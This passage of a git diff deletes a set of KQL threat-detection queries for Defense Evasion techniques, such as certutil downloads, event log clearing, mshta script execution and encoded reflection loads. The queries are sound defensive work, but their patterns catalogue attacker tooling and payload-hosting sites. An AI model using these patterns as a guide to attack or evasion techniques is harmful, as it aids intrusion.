contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql deleted file mode 100644 index 9ce127d5..00000000 --- a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the execution of certutil with certain flags that allow the utility to download files. -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql b/Defense Evasion/Suspicious_DumpMinitool_Execution.kql deleted file mode 100644 index d77e0e31..00000000 --- a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/06 -// Level: high -// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql deleted file mode 100644 index c8bc79a5..00000000 --- a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" -// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql deleted file mode 100644 index 700cfc45..00000000 --- a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/20 -// Level: high -// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql b/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql deleted file mode 100644 index b126c478..00000000 --- a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105 -// Date: 2019/09/26 -// Level: high -// Description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others). -// Tags: attack.defense_evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002 -DeviceProcessEvents -| where (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) or ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and FolderPath endswith "\\wevtutil.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Executable_File_Creation.kql b/Defense Evasion/Suspicious_Executable_File_Creation.kql deleted file mode 100644 index e8188447..00000000 --- a/Defense Evasion/Suspicious_Executable_File_Creation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/09/05 -// Level: high -// Description: Detect creation of suspicious executable file names. -Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. - -// Tags: attack.defense_evasion, attack.t1564 -DeviceFileEvents -| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql b/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql deleted file mode 100644 index 95f75b3a..00000000 --- a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: medium -// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not(((FolderPath contains "\\{" and FolderPath contains "}\\") or FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or isnull(FolderPath)))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql b/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql deleted file mode 100644 index 36f6b599..00000000 --- a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/23 -// Level: medium -// Description: Uses the .NET InstallUtil.exe application in order to execute image without log -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Extexport_Execution.kql b/Defense Evasion/Suspicious_Extexport_Execution.kql deleted file mode 100644 index 35568b7e..00000000 --- a/Defense Evasion/Suspicious_Extexport_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/26 -// Level: medium -// Description: Extexport.exe loads dll and is execute from other folder the original path -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "Extexport.exe" or FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql deleted file mode 100644 index dcfdf274..00000000 --- a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/26 -// Level: medium -// Description: Extract data from cab file and hide it in an alternate data stream -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql b/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql deleted file mode 100644 index d2f5c2de..00000000 --- a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/09 -// Level: high -// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild -// Tags: attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index f12091dd..00000000 --- a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware -// Tags: attack.persistence, attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql deleted file mode 100644 index 99d431f0..00000000 --- a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs -// Tags: attack.defense_evasion, attack.execution -DeviceFileEvents -| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql deleted file mode 100644 index 50e632ee..00000000 --- a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: high -// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql deleted file mode 100644 index e9033362..00000000 --- a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: high -// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql deleted file mode 100644 index 195823a7..00000000 --- a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: high -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql b/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql deleted file mode 100644 index 9f95881c..00000000 --- a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder -// Tags: attack.t1036.005, attack.defense_evasion -DeviceFileEvents -| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_GUP_Usage.kql b/Defense Evasion/Suspicious_GUP_Usage.kql deleted file mode 100644 index 4b5e7075..00000000 --- a/Defense Evasion/Suspicious_GUP_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/02/06 -// Level: high -// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql b/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql deleted file mode 100644 index da1a04b7..00000000 --- a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/04/23 -// Level: high -// Description: Get-Variable is a valid PowerShell cmdlet -WindowsApps is by default in the path where PowerShell is executed. -So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. - -// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027 -DeviceFileEvents -| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_HH.EXE_Execution.kql b/Defense Evasion/Suspicious_HH.EXE_Execution.kql deleted file mode 100644 index cd21df94..00000000 --- a/Defense Evasion/Suspicious_HH.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql b/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql deleted file mode 100644 index a625bfda..00000000 --- a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/09 -// Level: informational -// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and ProcessIntegrityLevel =~ "High" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql b/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql deleted file mode 100644 index 04a154d3..00000000 --- a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/22 -// Level: medium -// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql b/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql deleted file mode 100644 index 8b9e448e..00000000 --- a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Detects execution of javascript code using "mshta.exe". -// Tags: attack.defense_evasion, attack.t1218.005 -DeviceProcessEvents -| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql b/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql deleted file mode 100644 index ab40eb86..00000000 --- a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022/11/07 -// Level: medium -// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. - -// Tags: attack.defense_evasion, attack.t1036.007 -DeviceFileEvents -| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql b/Defense Evasion/Suspicious_MSDT_Parent_Process.kql deleted file mode 100644 index 294e0977..00000000 --- a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nextron Systems -// Date: 2022/06/01 -// Level: high -// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation -// Tags: attack.defense_evasion, attack.t1036, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql b/Defense Evasion/Suspicious_MSHTA_Child_Process.kql deleted file mode 100644 index 0e72056c..00000000 --- a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag -// Date: 2019/01/16 -// Level: high -// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution -// Tags: attack.defense_evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql b/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql deleted file mode 100644 index 255e5e51..00000000 --- a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io -// Date: 2018/04/06 -// Level: high -// Description: Detects a suspicious process spawning from one of the 